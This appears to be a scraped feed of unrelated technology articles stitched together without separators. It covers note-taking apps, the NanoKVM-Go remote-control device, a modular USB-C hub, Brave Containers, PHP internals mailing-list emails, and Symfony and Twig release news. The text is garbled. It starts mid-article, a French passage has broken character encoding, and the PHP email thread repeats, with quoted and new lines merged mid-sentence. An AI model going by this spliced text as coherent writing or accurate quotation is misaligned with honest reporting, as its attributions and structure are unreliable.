You write long-form notes, prefer traditional files and folders, and enjoy customizing your workspace through plugins. It works particularly well if you're willing to invest time in organizing your knowledge base and maintaining a structured note system.
You naturally think in outlines and bullet points. Its journal-first workflow, block-based organization, built-in flashcards, and PDF annotation tools make it an excellent choice for quickly capturing ideas before organizing them later.
It is also a strong option for users who prefer fully open-source software.
For a long time, I've used both applications side by side.
I wouldn't generally recommend this approach unless you're comfortable managing two separate knowledge bases every day.
In my workflow, Obsidian is where I keep long-form notes, article drafts, and web clippings.
Logseq is where I quickly capture ideas, maintain journals, and collect thoughts before they grow into larger pieces of writing.
This workflow still works well for me because my overall note collection is manageable.
As my knowledge base continues to grow, however, I expect to simplify everything into a system that's easier to maintain over the long term.
This article was never meant to declare one application objectively better than the other. Obsidian and Logseq reflect two different ways of thinking about notes.
Obsidian works better for me when I need a polished writing environment. Logseq works better when I want to collect, nest, and connect ideas quickly.
At the end of the day, the best note-taking app is the one that fits the way you actually work.
Which one do you use: Obsidian, Logseq, Joplin, Zim Wiki, or something else? Share your workflow in the comments.
Sipeed has been making tiny RISC-V and ARM boards for the maker crowd for years, and its NanoKVM line is already a familiar name if you have ever wanted BIOS-level remote access without paying enterprise IPMI prices.
Sipeed has announced a new entry in the NanoKVM line. It is called NanoKVM-Go, it is miniature and skips the usual pile of HDMI, USB, Ethernet, and power cables entirely. It comes with just USB-C cable to the target device and WiFi 6 for the connectivity. That's it.
The NanoKVM-Go is on Kickstarter and has already achived its funding goal by raising over a $130,000 against its target of approximately $6,000.
This tiny KVM also generated quite a buzz on Twitter, perhaps because it used the term "AI-native" in its campaign.
Yes, Sipeed is calling it the world's first "AI-native" KVM, built so that an AI agent can watch your screen and act on it at the hardware level. Interesting, right?

Here are the main hardware specifications for NanoKVM-GO:
The device is priced to be $89 for Go and $129 for Go+. But if you back them in the crowdfunding campaign, you can get them for $69 and $99 respectively.
The main USB-C port on NanoKVM-Go carries video and audio (over DisplayPort Alt Mode), keyboard and mouse emulation, disk emulation for mounting OS images, and even a virtual network interface, all through that single cable. A separate auxiliary USB-C port handles power pass-through so your laptop or phone keeps charging during a long session.
It also powers an optional FingerBot accessory that can physically press a stuck computer's power button for a hard reboot. Yes, you read that right.
On the capture side, it does 4K at 45Hz or 2K at 90Hz, with latency Sipeed lists at 60ms for 1080p60, 80ms for 2K60, and 100ms for 4K30. That is over dual-band WiFi 6, rated up to 286Mbps, with Tailscale built in so you can reach the device remotely without setting up port forwarding.

Since it works with anything that supports USB-C DisplayPort Alt Mode, that covers MacBooks, Mac minis, any laptop with USB C port, iPhone 15 and later, several Android phones, and even the Steam Deck.

Under the hood is an unnamed SoC that is probably the same Axera Tech AX630C used in the existing NanoKVM Pro. It is paired with a dual-core Cortex-A53 and a 3.2 TOPS NPU. The base NanoKVM-Go gets 256MB of RAM and 16GB of eMMC storage, and the whole thing draws around 1.6W at 4K30.
The NanoKVM-Go+ doubles the memory to 512MB and jumps to 64GB of eMMC, all in service of a feature Sipeed calls "Ambient Screen Intelligence,"which is basically its own version of the infamous Microsoft's Recall.
It continuously captures your screen, stores up to 180 days of history locally, and lets you search through it later with plain text, all processed on-device without cloud uploads or a subscription.
Whether you actually want a machine remembering everything on your screen for six months is up too you, but at least Sipeed is keeping it local instead of 'calling it home' like Microslop.
Well... remotely accessing and controlling your device is the most straight forward use.
Typically, you would need to install a remote desktop or remote access solution on the host system that you want to control. But with this gadget attached to the machine, it becomes a 'plug and play'. You can assist your elderly parents and friends (if they have devices with USB-C) or control your homelab devices from outside the home network.
Let's talk about the "native AI" feature. See, every KVM function, keyboard input, mouse control, screen capture, is exposed as an MCP server that you can turn on yourself. That effectively turns the device into a hardware-level Computer Use Agent peripheral.

Instead of an AI agent needing screen-sharing software running on the target machine, it can drive the actual hardware through the KVM, which also means it works even if the target OS is frozen or sitting at a BIOS screen.
You can use Sipeed's own PicoClaw agent or go with OpenClaw, Claude Code, Codex, and Hermes Agent among other compatible options.
Sipeed is leaning on this to court the current wave of agentic AI tools, name-checking its own lightweight PicoClaw agent alongside OpenClaw, Claude Code, Codex, and Hermes Agent as compatible options.
The screen capture recall feature of Go+ is also helpful.
If you are running AI agents, you can let them run with your laptop lid closed (that's the running joke in the industry).
The announcement video could give you more ideas:
NanoKVM-Go is live on Kickstarter now, and it's already comfortably funded past its original $50,000 HKD (about $6,374) goal.
Back NanoKVM-Go on KickstarterThe Early Bird tier for the base NanoKVM-Go is going for $69 (instead of $89), and the Super Early Bird for NanoKVM-Go+ is $99 (instead of $129). Shipping adds roughly $20 for international backers, and rewards are expected to go out in August 2026.

If you want to use this device in your AI workflow, go for the Go+ version.
Suggested Read: If KVMs are your thing, we also covered the LeafKVM, an open source Rust and Buildroot based KVM-over-IP device that takes a very different, fully open approach.
Crowdfunding is one of the best ways to turn an idea into an actual product. A creator pitches something, sets a funding goal, and backers decide whether it is worth building.
While most campaigns stay small, a few do break out completely. The original Pebble smartwatch asked for $100,000 in 2012, walked away with over $10 million, going on to ship more than two million watches. It has since returned as an open source-focused outfit.
HW Media Lab already knows that path. Its first product, WebScreen, a hackable secondary display for gamers and creators, asked Crowd Supply for $5,250 and came back with $10,718, more than double its goal.
Now they are back again with a new creation that focuses on modular, repairable USB-C docking.

Not quite; the DockFrame is a modular USB-C hub built around Framework's open source Expansion Card slot standard. Instead of a fixed set of ports, it gives you four open slots that accept the same cards Framework sells for its laptops and desktops.
The hub itself operates on USB 3.2, with USB-C DisplayPort and Power Delivery passthrough up to 100 W on the downstream ports. The case is injection-molded and translucent, supports Framework's Desktop Tiles, and has a LEGO-compatible stud grid on the bottom so multiple units can be stacked once four slots stop being enough.
Slot in any of the Framework Expansion Cards, and DockFrame will treat them like they belong there. This means any spare USB-A, HDMI, Ethernet, or storage cards left over from a laptop upgrade do not have to sit in a drawer; they can go straight into the hub instead.
HW Media Lab builds its own Tool Cards too:

If none of the four fit what you need, you can design your own card using the same open slot standard or build a custom host app that talks to the onboard MCUs over USB serial, Wi-Fi, Bluetooth, or ESP-NOW.
Repairability is also a focus here, as the DockFrame is held together with screws instead of glue. Makers, embedded engineers, educators, and anyone tired of keeping a dock, a multimeter, and a bench supply as three separate boxes are the target audience here.
The DockFrame is yet to receive an official release date or a price tag. While you wait, you can keep an eye out on the Crowd Supply page for it, and if you want to share feedback, the official product page has a form you can fill out.
DockFrame (Crowd Supply)All the hardware-related files, like schematics, layouts, firmware, and the FreeCAD case files, should be available on GitHub once the crowdfunding campaign ends. You can track development by joining HW Lab's Discord server.
Brave has rolled out Containers with the Brave Browser 1.92 release, giving its Chromium-based browser something Firefox users have had for years now. And no, it is not some pre-installed extension doing the work; this functionality is built right into the browser for Linux, Windows, and macOS.
In this implementation, each container keeps its own cookies and site data storage separate from the rest, even if you visit the same website across containers. By default, this feature ships with four categories: Personal, Work, Social, and School. Each one of them can be edited or deleted to suit your workflow.


The default Container categories are useful, I must say.
You can make new ones too! I made one to test how containers worked, named it "It's FOSS," and picked a color and icon for it from the available options.
The idea itself isn't new. Brave points back to a Mozilla concept doc from 2015 that laid out the original pitch for container tabs in Firefox, complete with cookie isolation, per-container icons, and even auto-naming.

Mozilla eventually built a version of this right into the browser, with a Multi-Account Containers extension being made available for people who are unable to access Containers on their installation or want site auto-assignment and cross-device syncing.
Alongside named containers, Brave Browser also lets you spin up a temporary one straight from the right-click menu, for whenever you want quick isolation without setting up and naming a permanent container.


I tried it out myself, and instead of asking me to name anything, Brave auto-generated a random two-word name along with its own icon and color; mine came out as "Enter victory."
It still worked like any other container while it was open; I just did not have to set it up first.
Another thing to watch out for is that Brave is rolling out Containers gradually, so not everyone will see it on their installation just yet, and the feature is also being offered on Brave Origin, which, if you remember, is free for Linux users.
If you have already updated to Brave Browser 1.92 and still don't see a Containers option in your settings menu, then you could force-enable it by following these steps.
First, visit this address in your browser: brave://flags. Here, type containers into the search bar and click on the dropdown menu.


Now, click on Enabled to activate this feature on your installation and relaunch the browser. Next, visit the Settings page, and under the "Content" page, look for the Containers category and enable it.
This is how I got it running on my Fedora Workstation setup, so you should also be able to do the same on other platforms and even on Brave Origin.
Ă titre de comparaison, la consommation totale de la France Ă©tait « seulement » 10 fois supĂ©rieure avec 450 TWh environ en 2025. Google nâest pas bien loin du Portugal, dont la consommation Ă©tait dâun peu plus de 50 TWh pour lâensemble du pays. En France, selon le bilan 2024 de lâArcep, lâensemble des datacenters de lâHexagone (du moins ceux interrogĂ©s) ont consommĂ© 2,7 TWh dâĂ©lectricitĂ©.
Erreur 403 | #83 - Nouvelle faille CitrixBleed preÌ-auth sur NetScaler et retours des modeÌles Fable 5 et Mythos 5
Nouvelle faille CitrixBleed preÌ-authentification sur Citrix NetScaler, DirtyClone permettant dâeÌtre root sur Linux sans trace disque, attaque supply chain aÌ 3 millions de dollars chez Polymarket, vol de donneÌes aÌ lâINSEE (12 800 agents), acceÌs restaureÌ aux modeÌles Fable 5 et Mythos 5 dâAnthropic, etc.
Hi all,
Per Seifeddine's suggestion to keep this out of the karma-request thread, I'm opening a pre-RFC discussion for scalar object methods -- calling a small, curated set of methods directly on scalar values, e.g. $str->trim(), (3)->pow(2).
Hi Michal,
Thanks for bringing this to the list. I think it's an interesting experiment, but I agree with a lot of the previous responses that it's just too limited to be useful.
The advantage often given for scalar methods is to give us a chance to write a new set of standard utilities that's more consistent and easier to learn. But in order to achieve that, users need to be able to rely on it.
With this proposal, there's a long list of requirements:
you need to be running an up to date version of PHP; there's no way to "polyfill" the syntax in userland, or even backport specific methods introduced in later versions
the function you're looking for needs to have a method equivalent in a list that's starting small (again, no polyfills or backports)
you need to understand the requirements for what is allowed as a "receiver", or sprinkle a load of explicit types everywhere just in case
you still need to know what it's called, and what the parameters are
If any of those requirements aren't met, you're going to have to fall back on the existing function, which is probably described in several thousand easy to find web pages because it's been in PHP for 30 years.
Typed locals is an interesting feature in itself, but comes with a bunch of decisions around things like scope, shadowing, etc, as well as potential performance impact. It deserves an RFC to itself.
Even if we add that, encouraging users to write explicit types for every single variable goes against the current trend in other languages, where types are either inferred by default, or can be optionally interred with a keyword like "auto".
And while temporary variables can help readability, often they hurt it. Even with some of PHP's uglier function names, I think this...
echo htmlspecialchars($_GET['foo']);
...is probably nicer than this
string $temp=$_GET['foo'];
echo $temp->escapeHtml();
To be honest, I'm not even totally sold on this:
echo $_GET['foo']->escapeHtml();
When we could much more simply introduce this:
echo \Str\escape_html($_GET['foo']);
Rowan Tommins
[IMSoP]
I like it, and it's a real answer to the mechanics question, not just
the set one. Two honest things before I'd be sold:[..]
Genuinely interested. I'd like to see where this mechanics discussion
lands first, but I'm glad to talk â there's real overlap with what I
already have working, and no illusions about the 8.6 timeline.Michal
Hey Michal,
It is highly encouraged to write the emails yourself here, without
rephrasing via an LLM.
BR,
Juris
Hi all,
Per Seifeddine's suggestion to keep this out of the karma-request
thread, I'm opening a pre-RFC discussion for scalar object methods --
calling a small, curated set of methods directly on scalar values, e.g.
$str->trim(), (3)->pow(2). There's a complete, tested implementation and
a full write-up (links below); I'd like to surface the strongest
objections before I write the formal RFC.It may seem odd coming from me, but I am not in favor of scalar methods. Specifically because of this line:
small, curated set of methods
That is bikeshed bait, and needlessly limiting. I would not support that.
What we should do instead is take a cue from Kotlin and C#: Extension functions. Attach method-ish behavior to any type.
Sara Golemon and I worked up an idea of how it could work (with lots of "we could spell it X, or Y, or Z" bits still in there) a while ago, though I've not done anything with it since. (Plenty else to do.) The writeup is here:
https://gist.github.com/Crell/84cab7c3bf2b25e81b7f464945f6b678
I think that is a much better approach to take, and would be happy to work on it if someone wants to partner on it. (Though it's definitely not getting into 8.6 at this point, obviously.)
--Larry Garfield
Hi Larry,
small, curated set of methods
That is bikeshed bait, and needlessly limiting.
Agreed, so let's not bikeshed it here. The set is deliberately minimal,
just enough to show the mechanism working; its contents and naming
should be their own separate RFC down the line. The part I want to
discuss is the mechanics: how dispatch on a scalar receiver should work.
The set is downstream of that.
take a cue from Kotlin and C#: Extension functions. Attach method-ish
behavior to any type.
I like it, and it's a real answer to the mechanics question, not just
the set one. Two honest things before I'd be sold:
use Php\Str\length for string; in every file to call $s->length(), that's more ceremony than use reserved for userland extensions? The gist didn't pin that use. That keeps your Also, the compile-time pre-resolution your writeup mentions ("if we can
determine the type at compile time, pre-resolve, avoid runtime
overhead") is basically what I've already built for the guaranteed-type
cases, so there's working code for that half.
would be happy to work on it if someone wants to partner on it
Genuinely interested. I'd like to see where this mechanics discussion
lands first, but I'm glad to talk â there's real overlap with what I
already have working, and no illusions about the 8.6 timeline.
Michal
Hi all,
Per Seifeddine's suggestion to keep this out of the karma-request
thread, I'm opening a pre-RFC discussion for scalar object methods --
calling a small, curated set of methods directly on scalar values, e.g.
$str->trim(), (3)->pow(2). There's a complete, tested implementation and
a full write-up (links below); I'd like to surface the strongest
objections before I write the formal RFC.
It may seem odd coming from me, but I am not in favor of scalar methods. Specifically because of this line:
small, curated set of methods
That is bikeshed bait, and needlessly limiting. I would not support that.
What we should do instead is take a cue from Kotlin and C#: Extension functions. Attach method-ish behavior to any type.
Sara Golemon and I worked up an idea of how it could work (with lots of "we could spell it X, or Y, or Z" bits still in there) a while ago, though I've not done anything with it since. (Plenty else to do.) The writeup is here:
https://gist.github.com/Crell/84cab7c3bf2b25e81b7f464945f6b678
I think that is a much better approach to take, and would be happy to work on it if someone wants to partner on it. (Though it's definitely not getting into 8.6 at this point, obviously.)
--Larry Garfield
Il giorno ven 3 lug 2026 alle ore 23:51 Jakub Zelenka bukka@php.net ha
scritto:
Just a little follow up on this. I spoke with Arnaud, who is working on IO
hooks, and he got actually a better idea that we could allow using user
stream wrapper as an underlaying stream which would cover this much better.
So it could be used like this:$transport = fopen("my-dtls-transport://...");
stream_socket_enable_crypto($transport, true,
STREAM_CRYPTO_METHOD_DTLS_CLIENT);
fwrite($transport, "some data");It means that for your use case, we will probably
need stream_socket_enable_crypto. This will still need a custom BIO and
might not be completely straight forward so not something to look now. Just
keep that in mind.
Thanks to you and Arnaud, nice idea. Using a user stream wrapper as the
underlying transport and running DTLS on top of it via
'stream_socket_enable_crypto' (through a custom BIO) covers the case more
flexibly, leaving the application in control of the transport.
If I understand correctly: the app implements its own stream wrapper, then
'stream_socket_enable_crypto($transport, true,
STREAM_CRYPTO_METHOD_DTLS_CLIENT)' enables DTLS on top, with a custom BIO
that reads/writes through the underlying stream (instead of the datagram
BIO on the socket). Is that right?
Thanks again, I'll keep it in mind.
Kind regards,
Gianfrancesco
This week, Symfony released Twig 3.28.0, with improvements to macros and the sandbox. In addition, we published a case study on using Symfony in the industrial sector. Lastly, we proposed a redesign of the exception page for Symfony applications.
This week, 33 pull requests were merged (21 in code and 12 in docs) and 25 issues were closed (18 in code and 7 in docs). Excluding merges, 18 authors made 5,518 additions and 4,348 deletions. See details for code and docs.
These are some of the most recent Symfony job offers:
You can publish a Symfony job offer for free on symfony.com.
SymfonyCasts is the official way to learn Symfony. Select a track for a guided path through 100+ video tutorial courses about Symfony, PHP and JavaScript.
This week, SymfonyCasts published the following updates:
Twig 3.28.0 is out. This release sharpens error reporting with column numbers, brings back dynamic macro calls through the dot operator, and continues to polish the sandbox with less runtime overhead and finer-grained allow-listing. As usual, it also ships a batch of deprecations that pave the way for Twig 4.0.
Contributed by
Fabien Potencier
in
#4834
Until now, a Twig error only told you which line was at fault. On a dense line, that left you scanning for the actual problem. Twig now tracks the source offset of every token, so errors can point at the exact column.
The column is exposed through the new Error::getTemplateColumn() method, and
the underlying token offset through Token::getOffset().
Contributed by
Fabien Potencier
in
#4838
Calling a macro whose name is only known at runtime used to rely on the
attribute() function, which was deprecated in favor of the dot operator; but
the dot operator did not support macros. That gap is now closed:
{% import "forms.html.twig" as forms %}
{% set field = "text" %}
{{ forms.(field)(name, value) }}
The parenthesized expression is evaluated and used as the macro name, so you can pick a macro dynamically without falling back to a deprecated function.
Contributed by
Fabien Potencier
in
#4816
and #4819
Some filters, functions, tests, and tags are pure and inherently safe in a sandboxed template. Forcing every security policy to allow-list them by hand is noisy and error-prone.
Filters, functions, and tests now accept an always_allowed_in_sandbox
option, and token parsers can implement isAlwaysAllowedInSandbox(). When
set, the sandbox skips recording the name entirely, so it never reaches the
policy's security check: no allow-list entry required and no runtime cost. The
security policy also gains a dedicated allow-list for tests, with the safe
built-in tests flagged as always allowed so they keep working out of the box.
Contributed by
Fabien Potencier
in
#4823
The sandbox used to wrap every argument of every callable with a __toString
check. Twig now wraps an argument only when its PHP parameter type can actually
coerce a value to a string. Arguments typed as int, for instance, are left
untouched, which cuts the amount of generated code and speeds up sandboxed
rendering. The approach stays conservative: untyped, mixed, string,
array, iterable, object, Stringable, and unknown class types all
keep their check.
Contributed by
Fabien Potencier
in
#4292
Being able to parse and compile a template does not mean it is semantically
correct. A new CorrectnessNodeVisitor centralizes those checks and
deprecates a few constructs that happened to work but were never meant to:
using a block tag inside a capture node such as set, and using a
macro, extends, or use tag somewhere other than the root of a
template.
Contributed by
Fabien Potencier
in
#4840
Twig\Markup is now marked @final and will become truly final in Twig
4.0.
include() function now returns a Markup object, so a result assigned
to a variable is no longer re-escaped when printed.block() calls now
resolve against the overriding template when a block rendered through
block(name, template) calls parent().Stringable objects)
report a usable stack trace at the print location.html_attr function.Markup values are no longer treated as truthy in boolean expressions.html_attr function (@fabpot)chr() deprecation when decoding octal string escapes (@austinderrick)__toString check on arguments whose PHP parameter type cannot implicitly coerce to string (@fabpot)When dealing with over 10 million tons of hazardous waste every year, IT operational efficiency is a prerquisite and a critical environmental and public health responsibility
As the European leader in treating hazardous industrial waste and restoring polluted sites, Veolia | Hazardous Waste Europe faced a major digital hurdle. Their legacy tool used by their sales representatives to subscribe their clients to the waste management functionalities of the customer portal, Optilia, was beginning to hit its performance and ergonomic limits.
To transform this cornerstone of their commercial operations, Veolia turned to technical expert Webnet. The mission: overhaul and build a brand-new, lightning-fast, intuitive, and secure back-office platform.
Here is how Webnet leveraged the power, modularity, and technical consistency of Symfony to deliver a highly scalable cloud solution in just 10 months:
When Webnet audited the project requirements, the decision to build the new Optilia back-office on Symfony emerged naturally for three strategic reasons:
Unifying the Ecosystem: Symfony was already the powerhouse driving the Optilia front-office portal. Opting for Symfony for the back-office ensured complete architectural continuity, which heavily simplified long-term maintenance and future feature scalability.
Absolute Freedom: Industrial waste management involves highly specific workflows, unique data structures, and complex compliance tracking. Symfony provided the engineering team with complete flexibility to craft customized business features without dealing with framework constraints.
Proven Team Expertise: As a seasoned expert in custom web application development, Webnet knew they could rely on the modern foundations of Symfony to guarantee code quality, robust security, and rapid development cycles.
To fulfill Veolia high standards of responsiveness and administrative control, Webnet deployed a multi-disciplinary team, including 4 dedicated PHP/Symfony developers.
The team designed a robust stack combining PHP, Symfony, PostgreSQL, and AWS Cloud hosting. Instead of over-engineering the platform with heavy external layers, the team cleverly picked specific Symfony components to address their core technical challenges:
Ten months after the development kick-off, the new back-office platform went live. Webnet comprehensive approach, blending expert engineering with user training and change managementâresulted in immediate success:
Dramatically Faster Operations: Sales teams transitioned from a sluggish legacy system to a fast, intuitive experience, slashing wait times and accelerating subscription workflows.
Enthusiastic User Adoption: The ergonomic UX delivered through Symfony UX renewed team enthusiasm and drove instant internal adoption.
Stronger Client Relationships: The enhanced administration capabilities of the Optilia extranet gave clients greater transparency over environmental reporting.
Future-Proof Architecture: Powered by AWS and the modularity of Symfony, the system is highly available and ready to evolve alongside fluctuating industrial waste volumes and shifting European regulations.
By choosing Symfony, Webnet and Veolia proved that enterprise-grade environmental management tools can be both technologically sophisticated yet simple and intuitive to use.
Technical stack
This week, maintenance versions 6.4.42, 7.4.14, 8.0.14, and 8.1.1 were released. In addition, development activity for the upcoming Symfony 8.2 version was intense, adding new features such as a Cron constraint for validating cron expressions, single-use signed URLs, a visual indicator for dumped variables in the profiler, and support for passing non-string parameters to constraints.
This week, 51 pull requests were merged (40 in code and 11 in docs) and 26 issues were closed (18 in code and 8 in docs). Excluding merges, 24 authors made additions and deletions. See details for code and docs.
These are some of the most recent Symfony job offers:
You can publish a Symfony job offer for free on symfony.com.
SymfonyCasts is the official way to learn Symfony. Select a track for a guided path through 100+ video tutorial courses about Symfony, PHP and JavaScript.
This week, SymfonyCasts published the following updates:
Symfony 8.1.1 has just been released.
Read the Symfony upgrade guide to learn more about upgrading Symfony and use the SymfonyInsight upgrade reports to detect the code you will need to change in your project.
Tip
Want to be notified whenever a new Symfony release is published? Or when a version is not maintained anymore? Or only when a security issue is fixed? Consider subscribing to the Symfony Roadmap Notifications.